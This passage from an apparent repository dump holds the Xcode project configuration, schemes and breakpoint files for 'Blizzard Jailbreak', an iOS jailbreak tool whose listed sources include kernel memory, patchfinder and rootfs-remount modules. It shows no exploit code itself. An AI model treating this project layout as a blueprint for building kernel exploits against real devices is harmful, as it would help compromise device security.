*/,\n\t\t\t\t8288501522E07C15005D10FC /* offsets.m in Sources */,\n\t\t\t\tD69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */,\n\t\t\t\t8288501222E07303005D10FC /* kernel_memory.c in Sources */,\n\t\t\t\tD613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */,\n\t\t\t\tD62CA1E524E1C7EA002E6756 
/* patchfinder64.m in Sources */,\n\t\t\t\tD63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */,\n\t\t\t\tD69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0022DF4ED800231F8C /* Sources */ = {\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0B22DF4ED800231F8C /* Sources */ = {\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXSourcesBuildPhase section */\n\n/* Begin PBXTargetDependency section */\n\t\t82F17A0622DF4ED800231F8C /* PBXTargetDependency */ = {\n\t\t\tisa = PBXTargetDependency;\n\t\t\ttarget = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;\n\t\t\ttargetProxy = 82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */;\n\t\t};\n\t\t82F17A1122DF4ED800231F8C /* PBXTargetDependency */ = {\n\t\t\tisa = PBXTargetDependency;\n\t\t\ttarget = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;\n\t\t\ttargetProxy = 82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */;\n\t\t};\n/* End PBXTargetDependency section */\n\n/* Begin PBXVariantGroup section */\n\t\t82F179F522DF4ED700231F8C /* Main.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179F622DF4ED700231F8C /* Base */,\n\t\t\t);\n\t\t\tname = Main.storyboard;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\t82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179FB22DF4ED700231F8C /* Base */,\n\t\t\t);\n\t\t\tname = LaunchScreen.storyboard;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n/* End PBXVariantGroup section */\n\n/* Begin XCBuildConfiguration section 
*/\n\t\t82F17A1622DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++14\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_COMMA = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;\n\t\t\t\tCLANG_WARN_OBJC_LITERAL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_RANGE_LOOP_ANALYSIS = YES;\n\t\t\t\tCLANG_WARN_STRICT_PROTOTYPES = YES;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVE = YES;\n\t\t\t\tCLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = dwarf;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tENABLE_TESTABILITY = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu11;\n\t\t\t\tGCC_DYNAMIC_NO_PIC = NO;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_OPTIMIZATION_LEVEL = 0;\n\t\t\t\tGCC_PREPROCESSOR_DEFINITIONS = (\n\t\t\t\t\t\"DEBUG=1\",\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t);\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = 
YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.2;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = YES;\n\t\t\t\tONLY_ACTIVE_ARCH = YES;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A1722DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++14\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_COMMA = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;\n\t\t\t\tCLANG_WARN_OBJC_LITERAL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_RANGE_LOOP_ANALYSIS = YES;\n\t\t\t\tCLANG_WARN_STRICT_PROTOTYPES = YES;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVE = YES;\n\t\t\t\tCLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = \"dwarf-with-dsym\";\n\t\t\t\tENABLE_NS_ASSERTIONS = 
NO;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu11;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.2;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = NO;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t\tVALIDATE_PRODUCT = YES;\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\t82F17A1922DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = YES;\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = U7CBM293CM;\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tHEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tINFOPLIST_FILE = \"$(SRCROOT)/Blizzard Jailbreak/Info.plist\";\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.0;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tLIBRARY_SEARCH_PATHS = (\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t\t\"$(PROJECT_DIR)/sock_port\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t);\n\t\t\t\tOTHER_CPLUSPLUSFLAGS = 
\"$(OTHER_CFLAGS)\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = com.geosn0w.blizzard;\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tPROVISIONING_PROFILE_SPECIFIER = \"\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tUSER_HEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tVALID_ARCHS = \"arm64 arm64e armv7\";\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A1A22DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = YES;\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = U7CBM293CM;\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tHEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tINFOPLIST_FILE = \"$(SRCROOT)/Blizzard Jailbreak/Info.plist\";\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.0;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tLIBRARY_SEARCH_PATHS = (\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t\t\"$(PROJECT_DIR)/sock_port\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t);\n\t\t\t\tOTHER_CPLUSPLUSFLAGS = \"$(OTHER_CFLAGS)\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = 
com.geosn0w.blizzard;\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tPROVISIONING_PROFILE_SPECIFIER = \"\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tUSER_HEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tVALID_ARCHS = \"arm64 arm64e armv7\";\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\t82F17A1C22DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tBUNDLE_LOADER = \"$(TEST_HOST)\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeTests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeTests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_HOST = \"$(BUILT_PRODUCTS_DIR)/Blizzard Jailbreak.app/Blizzard Jailbreak\";\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A1D22DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tBUNDLE_LOADER = \"$(TEST_HOST)\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeTests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeTests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_HOST = \"$(BUILT_PRODUCTS_DIR)/Blizzard Jailbreak.app/Blizzard Jailbreak\";\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\t82F17A1F22DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeUITests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) 
@executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeUITests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_TARGET_NAME = socket_free;\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A2022DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeUITests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeUITests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_TARGET_NAME = socket_free;\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n/* End XCBuildConfiguration section */\n\n/* Begin XCConfigurationList section */\n\t\t82F179E722DF4ED700231F8C /* Build configuration list for PBXProject \"Blizzard Jailbreak\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1622DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A1722DF4ED800231F8C /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\t82F17A1822DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard Jailbreak\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1922DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A1A22DF4ED800231F8C /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\t82F17A1B22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakTests\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1C22DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A1D22DF4ED800231F8C /* Release 
*/,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\t82F17A1E22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakUITests\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1F22DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A2022DF4ED800231F8C /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n/* End XCConfigurationList section */\n\t};\n\trootObject = 82F179E422DF4ED700231F8C /* Project object */;\n}\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/contents.xcworkspacedata",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Workspace\n   version = \"1.0\">\n   <FileRef\n      location = \"self:/Users/geosn0w/Desktop/sock_port-sock_port_2/Blizzard Jailbreak.xcodeproj\">\n   </FileRef>\n</Workspace>\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>IDEDidComputeMac32BitWarning</key>\n\t<true/>\n</dict>\n</plist>\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/xcshareddata/xcschemes/sock_port.xcscheme",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Scheme\n   LastUpgradeVersion = \"1010\"\n   version = \"1.3\">\n   <BuildAction\n      parallelizeBuildables = \"YES\"\n      buildImplicitDependencies = \"YES\">\n      <BuildActionEntries>\n         <BuildActionEntry\n            buildForTesting = \"YES\"\n            buildForRunning = \"YES\"\n            buildForProfiling = \"YES\"\n            buildForArchiving = \"YES\"\n            buildForAnalyzing = \"YES\">\n            <BuildableReference\n               BuildableIdentifier = \"primary\"\n               BlueprintIdentifier = \"82F179EB22DF4ED700231F8C\"\n               BuildableName = \"Blizzard Jailbreak.app\"\n               BlueprintName = \"Blizzard Jailbreak\"\n               ReferencedContainer = \"container:Blizzard Jailbreak.xcodeproj\">\n            </BuildableReference>\n         </BuildActionEntry>\n      </BuildActionEntries>\n   </BuildAction>\n   <TestAction\n      buildConfiguration = \"Debug\"\n      selectedDebuggerIdentifier = \"Xcode.DebuggerFoundation.Debugger.LLDB\"\n      selectedLauncherIdentifier = \"Xcode.DebuggerFoundation.Launcher.LLDB\"\n      shouldUseLaunchSchemeArgsEnv = \"YES\">\n      <Testables>\n         <TestableReference\n            skipped = \"NO\">\n            <BuildableReference\n               BuildableIdentifier = \"primary\"\n               BlueprintIdentifier = \"82F17A0322DF4ED800231F8C\"\n               BuildableName = \"Blizzard JailbreakTests.xctest\"\n               BlueprintName = \"Blizzard JailbreakTests\"\n               ReferencedContainer = \"container:Blizzard Jailbreak.xcodeproj\">\n            </BuildableReference>\n         </TestableReference>\n         <TestableReference\n            skipped = \"NO\">\n            <BuildableReference\n               BuildableIdentifier = \"primary\"\n               BlueprintIdentifier = \"82F17A0E22DF4ED800231F8C\"\n               BuildableName = \"Blizzard JailbreakUITests.xctest\"\n               
BlueprintName = \"Blizzard JailbreakUITests\"\n               ReferencedContainer = \"container:Blizzard Jailbreak.xcodeproj\">\n            </BuildableReference>\n         </TestableReference>\n      </Testables>\n      <MacroExpansion>\n         <BuildableReference\n            BuildableIdentifier = \"primary\"\n            BlueprintIdentifier = \"82F179EB22DF4ED700231F8C\"\n            BuildableName = \"Blizzard Jailbreak.app\"\n            BlueprintName = \"Blizzard Jailbreak\"\n            ReferencedContainer = \"container:Blizzard Jailbreak.xcodeproj\">\n         </BuildableReference>\n      </MacroExpansion>\n      <AdditionalOptions>\n      </AdditionalOptions>\n   </TestAction>\n   <LaunchAction\n      buildConfiguration = \"Debug\"\n      selectedDebuggerIdentifier = \"Xcode.DebuggerFoundation.Debugger.LLDB\"\n      selectedLauncherIdentifier = \"Xcode.DebuggerFoundation.Launcher.LLDB\"\n      launchStyle = \"0\"\n      useCustomWorkingDirectory = \"NO\"\n      ignoresPersistentStateOnLaunch = \"NO\"\n      debugDocumentVersioning = \"YES\"\n      debugServiceExtension = \"internal\"\n      allowLocationSimulation = \"YES\">\n      <BuildableProductRunnable\n         runnableDebuggingMode = \"0\">\n         <BuildableReference\n            BuildableIdentifier = \"primary\"\n            BlueprintIdentifier = \"82F179EB22DF4ED700231F8C\"\n            BuildableName = \"Blizzard Jailbreak.app\"\n            BlueprintName = \"Blizzard Jailbreak\"\n            ReferencedContainer = \"container:Blizzard Jailbreak.xcodeproj\">\n         </BuildableReference>\n      </BuildableProductRunnable>\n      <AdditionalOptions>\n      </AdditionalOptions>\n   </LaunchAction>\n   <ProfileAction\n      buildConfiguration = \"Release\"\n      shouldUseLaunchSchemeArgsEnv = \"YES\"\n      savedToolIdentifier = \"\"\n      useCustomWorkingDirectory = \"NO\"\n      debugDocumentVersioning = \"YES\">\n      <BuildableProductRunnable\n         runnableDebuggingMode = \"0\">\n     
    <BuildableReference\n            BuildableIdentifier = \"primary\"\n            BlueprintIdentifier = \"82F179EB22DF4ED700231F8C\"\n            BuildableName = \"Blizzard Jailbreak.app\"\n            BlueprintName = \"Blizzard Jailbreak\"\n            ReferencedContainer = \"container:Blizzard Jailbreak.xcodeproj\">\n         </BuildableReference>\n      </BuildableProductRunnable>\n   </ProfileAction>\n   <AnalyzeAction\n      buildConfiguration = \"Debug\">\n   </AnalyzeAction>\n   <ArchiveAction\n      buildConfiguration = \"Release\"\n      revealArchiveInOrganizer = \"YES\">\n   </ArchiveAction>\n</Scheme>\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/geosn0w.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Bucket\n   type = \"1\"\n   version = \"2.0\">\n</Bucket>\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Bucket\n   type = \"1\"\n   version = \"2.0\">\n   <Breakpoints>\n      <BreakpointProxy\n         BreakpointExtensionID = \"Xcode.Breakpoint.FileBreakpoint\">\n         <BreakpointContent\n            shouldBeEnabled = \"Yes\"\n            ignoreCount = \"0\"\n            continueAfterRunningActions = \"No\"\n            filePath = \"socket_free/iosurface.c\"\n            timestampString = \"585067323.131232\"\n            startingColumnNumber = \"9223372036854775807\"\n            endingColumnNumber = \"9223372036854775807\"\n            startingLineNumber = \"121\"\n            endingLineNumber = \"121\"\n            landmarkName = \"IOSurface_set_value\"\n            landmarkType = \"9\">\n         </BreakpointContent>\n      </BreakpointProxy>\n      <BreakpointProxy\n         BreakpointExtensionID = \"Xcode.Breakpoint.FileBreakpoint\">\n         <BreakpointContent\n            shouldBeEnabled = \"Yes\"\n            ignoreCount = \"0\"\n            continueAfterRunningActions = \"No\"\n            filePath = \"socket_free/iosurface.c\"\n            timestampString = \"585067323.131287\"\n            startingColumnNumber = \"9223372036854775807\"\n            endingColumnNumber = \"9223372036854775807\"\n            startingLineNumber = \"128\"\n            endingLineNumber = \"128\"\n            landmarkName = \"IOSurface_set_value\"\n            landmarkType = \"9\">\n         </BreakpointContent>\n      </BreakpointProxy>\n      <BreakpointProxy\n         BreakpointExtensionID = \"Xcode.Breakpoint.FileBreakpoint\">\n         <BreakpointContent\n            shouldBeEnabled = \"Yes\"\n            ignoreCount = \"0\"\n            continueAfterRunningActions = \"No\"\n            filePath = \"socket_free/AppDelegate.m\"\n            timestampString = \"585137060.314502\"\n            startingColumnNumber = \"9223372036854775807\"\n            endingColumnNumber = \"9223372036854775807\"\n            
startingLineNumber = \"21\"\n            endingLineNumber = \"21\"\n            landmarkName = \"-application:didFinishLaunchingWithOptions:\"\n            landmarkType = \"7\">\n         </BreakpointContent>\n      </BreakpointProxy>\n   </Breakpoints>\n</Bucket>\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>SchemeUserState</key>\n\t<dict>\n\t\t<key>socket_free.xcscheme</key>\n\t\t<dict>\n\t\t\t<key>orderHint</key>\n\t\t\t<integer>0</integer>\n\t\t</dict>\n\t</dict>\n</dict>\n</plist>\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist",
